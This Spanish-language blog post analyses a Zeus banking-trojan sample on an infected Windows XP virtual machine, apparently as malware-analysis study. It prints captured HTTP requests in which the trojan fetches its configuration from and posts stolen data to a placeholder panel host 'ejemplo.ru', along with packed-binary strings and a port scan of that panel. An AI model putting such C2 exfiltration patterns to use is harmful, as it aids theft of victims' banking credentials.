Hola!
Muy buenas a todos/as!
Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc..
Otro tipos de troyanos interactúan directamente con la Banca, solicitan los datos al usuario y, además conducen al usuario a la web legítima sin que este se percate de lo ocurrido. Este tipo de infecciones pueden venir a través de correo electrónico o pueden haber páginas webs maliciosas que contengan enlaces a software malicioso.
En este caso hay una máquina virtual con un software creado con un Builder del troyano Zeus.
Estos Builder cargan una configuración al binario, de donde ha de enviar los datos, el nombre del binario.. etc Este software lo distribuyen mediante diferentes vías y consiguen infectar usuarios que envían los datos donde el criminal tenga un panel web esperando la recogida de información.
En la máquina Windows XP que está infectada con Zeus, el cambio en el sistema de archivos que ha hecho el troyano, lo mas significativo es:
El binario se ha hecho una copia y guardado en la carpeta Datos de Programa, entre otras cosas.
En las conexiones de red, el troyano intentará conectarse con el panel de control que el criminal haya configurado con el Builder y descargarse la configuración.
GET /mm.bin HTTP/1.1Accept: */*Connection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruCache-Control: no-cache
El troyano se descarga la configuración que analizaremos en otro artículo.
También podemos ver como envía los datos al panel
POST /panel/acc.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruContent-Length: 387Connection: Keep-AliveCache-Control: no-cache
Ahora extraeremos los datos mediante strings del fichero así podemos ver algo de información del binario.
Aquí tenemos la cabecera de los strings extraídos:
!This program cannot be run in DOS mode.RichUPX0UPX1.rsrc3.03
Se puede ver que el troyano ha sido tratado con un packer estos packer dificultan el análisis por parte de los reversers. UPX es un compresor Open Source, pero en el caso de Malware se usa una versión modificada que dificulta la ingeniería inversa.
Seguramente el Builder lo lleva incorporado.
Hay mas cadenas interesantes que se pueden extraer del binario en cuestión:
XPTPSWKERNEL32.DLLadvapi32.dlluser32.dllLoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegCloseKeyFlashWindowEx$/x76Rg)$\!`7y5Gaz
Vaya, dll propias de sistema que interactúan con el troyano..
En el panel existen estos puertos abiertos:
22/tcp open ssh syn-ack25/tcp open smtp syn-ack80/tcp open http syn-ack111/tcp open rpcbind syn-ack427/tcp open svrloc syn-ack631/tcp open ipp syn-ack1720/tcp filtered H.323/Q.931 no-response2000/tcp filtered cisco-sccp no-response5060/tcp filtered sip no-response
En el siguiente capítulo seguiremos tratando con este troyano, espero que os haya gustado.
Saludos!!